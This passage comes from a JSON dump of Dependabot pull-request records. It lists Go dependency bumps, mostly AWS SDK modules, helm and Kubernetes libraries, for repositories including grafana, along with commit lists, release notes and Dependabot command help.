1.31.11\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/67db6904b816b95073883b7ad378384c4839b28c\"\u003e\u003ccode\u003e67db690\u003c/code\u003e\u003c/a\u003e Release 2025-09-26\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/32ee1b5d75fc303c0626a6f5e769f4e08cc491a8\"\u003e\u003ccode\u003e32ee1b5\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/0b431223309a815cffc048072556aa651ee1455f\"\u003e\u003ccode\u003e0b43122\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/44786d920f3627b73a99e81c7b6399dbfcf7ab42\"\u003e\u003ccode\u003e44786d9\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/c98edb73809256823906d7e307ecf3c9abc16700\"\u003e\u003ccode\u003ec98edb7\u003c/code\u003e\u003c/a\u003e update internal endpts comment that was wrong (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3194\"\u003e#3194\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/88da3c8c5569dece0e99802dab638faa047a0db0\"\u003e\u003ccode\u003e88da3c8\u003c/code\u003e\u003c/a\u003e Release 2025-09-25\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/74a74fc179f8bbd879383cc75fa29a1937266dcc\"\u003e\u003ccode\u003e74a74fc\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5e6f7ae6139ca69044bb706664b4dbdc31227a32\"\u003e\u003ccode\u003e5e6f7ae\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/0e722ab42ff6bc6bb810c2937b8e1b41937e17c3\"\u003e\u003ccode\u003e0e722ab\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/41a7d004b9ff794f6007d30168afc825031f2c61\"\u003e\u003ccode\u003e41a7d00\u003c/code\u003e\u003c/a\u003e Release 2025-09-24\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.26.6...config/v1.31.11\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/s3` from 1.89.2 to 1.100.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/18fee87f2c0615b0e5c3f28f1b95af810a9e77b5\"\u003e\u003ccode\u003e18fee87\u003c/code\u003e\u003c/a\u003e Release 2026-04-22\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/0ce157cd6b5427066ddb682a4967a3047230de4b\"\u003e\u003ccode\u003e0ce157c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/68cdb4a02d56b9d932fbfed22660cfa64e815ef6\"\u003e\u003ccode\u003e68cdb4a\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f399972fb759f6ffd315963de511da785ef408e6\"\u003e\u003ccode\u003ef399972\u003c/code\u003e\u003c/a\u003e Bump Smithy from 1.67.0 to 1.69.0 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3394\"\u003e#3394\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3c19a9b3eb17f48f6b9fc1cad644859d062775ad\"\u003e\u003ccode\u003e3c19a9b\u003c/code\u003e\u003c/a\u003e Release 2026-04-21\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/1dfac3ec5a6c560e6fee389d0f1f364eb57ae616\"\u003e\u003ccode\u003e1dfac3e\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/d842df6fcef5ecc94e2133cb1d96fac4926aadb4\"\u003e\u003ccode\u003ed842df6\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ffeb52a25097274529920d8f91b4ca27f7b636a9\"\u003e\u003ccode\u003effeb52a\u003c/code\u003e\u003c/a\u003e bump to latest smithy-go codegen (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3393\"\u003e#3393\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e839880e8d30897bd8a7684d83626d81f82c565a\"\u003e\u003ccode\u003ee839880\u003c/code\u003e\u003c/a\u003e Release 2026-04-20\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/4c898c88577f4102793d3e15de05ad3b5b1e2ef5\"\u003e\u003ccode\u003e4c898c8\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/s3/v1.89.2...service/s3/v1.100.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/secretsmanager` from 1.40.1 to 1.41.6\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9bc9c51d733fd437a60a8710531477ca0347dcc4\"\u003e\u003ccode\u003e9bc9c51\u003c/code\u003e\u003c/a\u003e Release 2026-04-17\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2b41455a8d88032b9b76b0bafbe23de0a61a6f29\"\u003e\u003ccode\u003e2b41455\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2327a1b15b5f16414e715325bc9579082fde0767\"\u003e\u003ccode\u003e2327a1b\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9225797aa8ce8661d61f4628973aface4e01c922\"\u003e\u003ccode\u003e9225797\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/7b6f675adb365c7b069aaf2a8e81c4b8f8a5d08e\"\u003e\u003ccode\u003e7b6f675\u003c/code\u003e\u003c/a\u003e Bump smithy-go to 1.25 (again) (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3390\"\u003e#3390\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/c8b6a97220901cccfd8a06f6f25aef65a967384c\"\u003e\u003ccode\u003ec8b6a97\u003c/code\u003e\u003c/a\u003e Release 2026-04-16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/4a05c2ba948715d305aff4519154abe2c4799246\"\u003e\u003ccode\u003e4a05c2b\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6cd4cc9201382be2638c8b4951b5d92de73c1161\"\u003e\u003ccode\u003e6cd4cc9\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3153bed494fb9e426640b30c7b91be0510b20362\"\u003e\u003ccode\u003e3153bed\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/fe3cef6cc115a2915f5410c739dc73d51553d709\"\u003e\u003ccode\u003efe3cef6\u003c/code\u003e\u003c/a\u003e Make AccountIDEndpointRouting aware of bdd endpoints (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3387\"\u003e#3387\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/v1.40.1...v1.41.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/sts` from 1.41.10 to 1.42.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ee5e3f05637540596cc7aab1359742000a8d533a\"\u003e\u003ccode\u003eee5e3f0\u003c/code\u003e\u003c/a\u003e Release 2023-11-01\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b65c226f47aa1f837699664bdc65c3c3e3611765\"\u003e\u003ccode\u003eb65c226\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/7a194b9b0344774a5af100d11ea2066c5b0cf234\"\u003e\u003ccode\u003e7a194b9\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/0cb924a0007bc681d12f382a604368e0660827ee\"\u003e\u003ccode\u003e0cb924a\u003c/code\u003e\u003c/a\u003e Add support for configured endpoints. (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/2328\"\u003e#2328\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/61039fea9cc9e080c53382850c87685b5406fd68\"\u003e\u003ccode\u003e61039fe\u003c/code\u003e\u003c/a\u003e Release 2023-10-31\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/797e0560769725635218fc30a2554c1bbaccc01b\"\u003e\u003ccode\u003e797e056\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/822585d3f621a7c5844584d8e471c32f852702aa\"\u003e\u003ccode\u003e822585d\u003c/code\u003e\u003c/a\u003e Update SDK's smithy-go dependency to v1.16.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/abf753db747dd256f3ee69712a19d1d3dc681f23\"\u003e\u003ccode\u003eabf753d\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/99861c071109ce5ee4f1cb3b72ead2062b3bd86c\"\u003e\u003ccode\u003e99861c0\u003c/code\u003e\u003c/a\u003e lang: bump minimum go version to 1.19 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/2338\"\u003e#2338\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2ac0a53ac45acaadc4526fd25b643dc46032b02a\"\u003e\u003ccode\u003e2ac0a53\u003c/code\u003e\u003c/a\u003e Release 2023-10-30\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/ecs/v1.41.10...service/s3/v1.42.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\n\n\n\u003c/details\u003e","html_url":"https://github.com/grafana/grafana/pull/123377","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/grafana%2Fgrafana/issues/123377","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/123377/packages"},{"uuid":"4257538666","node_id":"PR_kwDOFyRkIM7SGbzv","number":10744,"state":"open","title":"Bump the all-go-mod-patch-and-minor group across 2 directories with 41 updates","user":"dependabot[bot]","labels":["ok-to-test","size/XXL","dependabot"],"assignees":[],"locked":false,"comments_count":3,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-04-13T20:00:29.000Z","updated_at":"2026-04-20T21:17:33.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"all-go-mod-patch-and-minor","update_count":41,"packages":[{"name":"github.com/aws/aws-sdk-go","old_version":"1.50.36","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"},{"name":"github.com/aws/aws-sdk-go-v2","old_version":"1.30.1","new_version":"1.41.5","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/config","old_version":"1.26.6","new_version":"1.32.14","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/ec2","old_version":"1.167.1","new_version":"1.297.0","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/ecr","old_version":"1.27.4","new_version":"1.57.0","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/eks-anywhere-packages","old_version":"0.4.5","new_version":"0.4.15","repository_url":"https://github.com/aws/eks-anywhere-packages"},{"name":"github.com/aws/etcdadm-bootstrap-provider","old_version":"1.0.17","new_version":"1.0.19","repository_url":"https://github.com/aws/etcdadm-bootstrap-provider"},{"name":"github.com/aws/etcdadm-controller","old_version":"1.0.25","new_version":"1.0.27","repository_url":"https://github.com/aws/etcdadm-controller"},{"name":"github.com/bmc-toolbox/bmclib/v2","old_version":"2.1.1-0.20231206130132-1063371b9ed6","new_version":"2.3.5","repository_url":"https://github.com/bmc-toolbox/bmclib"},{"name":"github.com/docker/cli","old_version":"29.2.0+incompatible","new_version":"29.4.0+incompatible","repository_url":"https://github.com/docker/cli"},{"name":"github.com/go-git/go-git/v5","old_version":"5.17.1","new_version":"5.17.2","repository_url":"https://github.com/go-git/go-git"},{"name":"github.com/go-jose/go-jose/v3","old_version":"3.0.4","new_version":"3.0.5","repository_url":"https://github.com/go-jose/go-jose"},{"name":"github.com/nutanix-cloud-native/prism-go-client","old_version":"0.3.4","new_version":"0.7.1","repository_url":"https://github.com/nutanix-cloud-native/prism-go-client"},{"name":"github.com/onsi/gomega","old_version":"1.38.2","new_version":"1.39.1","repository_url":"https://github.com/onsi/gomega"},{"name":"github.com/spf13/cobra","old_version":"1.10.1","new_version":"1.10.2","repository_url":"https://github.com/spf13/cobra"},{"name":"github.com/vmware/govmomi","old_version":"0.51.0","new_version":"0.53.0","repository_url":"https://github.com/vmware/govmomi"},{"name":"golang.org/x/oauth2","old_version":"0.33.0","new_version":"0.36.0","repository_url":"https://github.com/golang/oauth2"},{"name":"gopkg.in/ini.v1","old_version":"1.67.0","new_version":"1.67.1"},{"name":"helm.sh/helm/v3","old_version":"3.18.5","new_version":"3.20.2","repository_url":"https://github.com/helm/helm"},{"name":"sigs.k8s.io/cluster-api/test","old_version":"1.11.1","new_version":"1.11.8","repository_url":"https://github.com/kubernetes-sigs/cluster-api"},{"name":"sigs.k8s.io/controller-runtime","old_version":"0.22.4","new_version":"0.22.5","repository_url":"https://github.com/kubernetes-sigs/controller-runtime"},{"name":"github.com/golang-jwt/jwt/v5","old_version":"5.2.2","new_version":"5.3.1","repository_url":"https://github.com/golang-jwt/jwt"},{"name":"github.com/itchyny/gojq","old_version":"0.12.17","new_version":"0.12.19","repository_url":"https://github.com/itchyny/gojq"},{"name":"k8s.io/kubelet","old_version":"0.29.5","new_version":"0.29.15","repository_url":"https://github.com/kubernetes/kubelet"}],"path":null,"ecosystem":"go"},"body":"Bumps the all-go-mod-patch-and-minor group with 24 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.50.36` | `1.55.8` |\n| [github.com/aws/aws-sdk-go-v2](https://github.com/aws/aws-sdk-go-v2) | `1.30.1` | `1.41.5` |\n| [github.com/aws/aws-sdk-go-v2/config](https://github.com/aws/aws-sdk-go-v2) | `1.26.6` | `1.32.14` |\n| [github.com/aws/aws-sdk-go-v2/service/ec2](https://github.com/aws/aws-sdk-go-v2) | `1.167.1` | `1.297.0` |\n| [github.com/aws/aws-sdk-go-v2/service/ecr](https://github.com/aws/aws-sdk-go-v2) | `1.27.4` | `1.57.0` |\n| [github.com/aws/eks-anywhere-packages](https://github.com/aws/eks-anywhere-packages) | `0.4.5` | `0.4.15` |\n| [github.com/aws/etcdadm-bootstrap-provider](https://github.com/aws/etcdadm-bootstrap-provider) | `1.0.17` | `1.0.19` |\n| [github.com/aws/etcdadm-controller](https://github.com/aws/etcdadm-controller) | `1.0.25` | `1.0.27` |\n| [github.com/bmc-toolbox/bmclib/v2](https://github.com/bmc-toolbox/bmclib) | `2.1.1-0.20231206130132-1063371b9ed6` | `2.3.5` |\n| [github.com/docker/cli](https://github.com/docker/cli) | `29.2.0+incompatible` | `29.4.0+incompatible` |\n| [github.com/go-git/go-git/v5](https://github.com/go-git/go-git) | `5.17.1` | `5.17.2` |\n| [github.com/go-jose/go-jose/v3](https://github.com/go-jose/go-jose) | `3.0.4` | `3.0.5` |\n| [github.com/nutanix-cloud-native/prism-go-client](https://github.com/nutanix-cloud-native/prism-go-client) | `0.3.4` | `0.7.1` |\n| [github.com/onsi/gomega](https://github.com/onsi/gomega) | `1.38.2` | `1.39.1` |\n| [github.com/spf13/cobra](https://github.com/spf13/cobra) | `1.10.1` | `1.10.2` |\n| [github.com/vmware/govmomi](https://github.com/vmware/govmomi) | `0.51.0` | `0.53.0` |\n| [golang.org/x/oauth2](https://github.com/golang/oauth2) | `0.33.0` | `0.36.0` |\n| gopkg.in/ini.v1 | `1.67.0` | `1.67.1` |\n| [helm.sh/helm/v3](https://github.com/helm/helm) | `3.18.5` | `3.20.2` |\n| [sigs.k8s.io/cluster-api/test](https://github.com/kubernetes-sigs/cluster-api) | `1.11.1` | `1.11.8` |\n| [sigs.k8s.io/controller-runtime](https://github.com/kubernetes-sigs/controller-runtime) | `0.22.4` | `0.22.5` |\n| [github.com/golang-jwt/jwt/v5](https://github.com/golang-jwt/jwt) | `5.2.2` | `5.3.1` |\n| [github.com/itchyny/gojq](https://github.com/itchyny/gojq) | `0.12.17` | `0.12.19` |\n| [k8s.io/kubelet](https://github.com/kubernetes/kubelet) | `0.29.5` | `0.29.15` |\n\nBumps the all-go-mod-patch-and-minor group with 10 updates in the /release/cli directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.54.12` | `1.55.8` |\n| [github.com/aws/aws-sdk-go-v2](https://github.com/aws/aws-sdk-go-v2) | `1.32.7` | `1.41.5` |\n| [github.com/aws/aws-sdk-go-v2/config](https://github.com/aws/aws-sdk-go-v2) | `1.26.6` | `1.32.14` |\n| [github.com/onsi/gomega](https://github.com/onsi/gomega) | `1.38.2` | `1.39.1` |\n| [github.com/spf13/cobra](https://github.com/spf13/cobra) | `1.10.1` | `1.10.2` |\n| [helm.sh/helm/v3](https://github.com/helm/helm) | `3.18.5` | `3.20.2` |\n| [sigs.k8s.io/controller-runtime](https://github.com/kubernetes-sigs/controller-runtime) | `0.22.4` | `0.22.5` |\n| [github.com/itchyny/gojq](https://github.com/itchyny/gojq) | `0.12.17` | `0.12.19` |\n| [github.com/aws/aws-sdk-go-v2/service/kms](https://github.com/aws/aws-sdk-go-v2) | `1.37.9` | `1.50.4` |\n| [github.com/fsouza/go-dockerclient](https://github.com/fsouza/go-dockerclient) | `1.12.2-0.20250814055408-c31f6141d29b` | `1.13.1` |\n\n\nUpdates `github.com/aws/aws-sdk-go` from 1.50.36 to 1.55.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.7 (2025-04-22)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/s3/s3manager\u003c/code\u003e: Abort multipart download if object is modified during download\n\u003cul\u003e\n\u003cli\u003eFixes \u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/4986\"\u003e4986\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.6 (2025-01-15)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix broken printf for go1.24\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.5 (2024-07-30)\u003c/h1\u003e\n\u003ch3\u003eService Client Updates\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/appstream\u003c/code\u003e: Updates service API and documentation\n\u003cul\u003e\n\u003cli\u003eAdded support for Red Hat Enterprise Linux 8 on Amazon AppStream 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/autoscaling\u003c/code\u003e: Updates service API and documentation\n\u003cul\u003e\n\u003cli\u003eIncrease the length limit for VPCZoneIdentifier from 2047 to 5000\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/codepipeline\u003c/code\u003e: Updates service API, documentation, and paginators\n\u003cul\u003e\n\u003cli\u003eAWS CodePipeline V2 type pipelines now support stage level conditions to enable development teams to safely release changes that meet quality and compliance requirements.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticache\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eDoc only update for changes to deletion API.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticloadbalancing\u003c/code\u003e: Updates service API\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/eventbridge\u003c/code\u003e: Updates service API\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/logs\u003c/code\u003e: Updates service API\n\u003cul\u003e\n\u003cli\u003eAdd v2 smoke tests and smithy smokeTests trait for SDK testing.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/models.lex.v2\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/rolesanywhere\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/tnb\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/workspaces\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eRemoving multi-session as it isn't supported for pools\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.4 (2024-07-29)\u003c/h1\u003e\n\u003ch3\u003eService Client Updates\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticache\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eRenaming full service name as it appears in developer documentation.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/memorydb\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/163aada692ed32951f979aacf452ded4c03b8a7c\"\u003e\u003ccode\u003e163aada\u003c/code\u003e\u003c/a\u003e release v1.55.7 (2025-04-22) (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/5346\"\u003e#5346\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/9eb2bfd2f949fc81b96cee6b5aae6d9b84abea75\"\u003e\u003ccode\u003e9eb2bfd\u003c/code\u003e\u003c/a\u003e Abort multi part download if the object is modified during download\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/8d203ccff393340d080be0417d091cc60354449b\"\u003e\u003ccode\u003e8d203cc\u003c/code\u003e\u003c/a\u003e Update 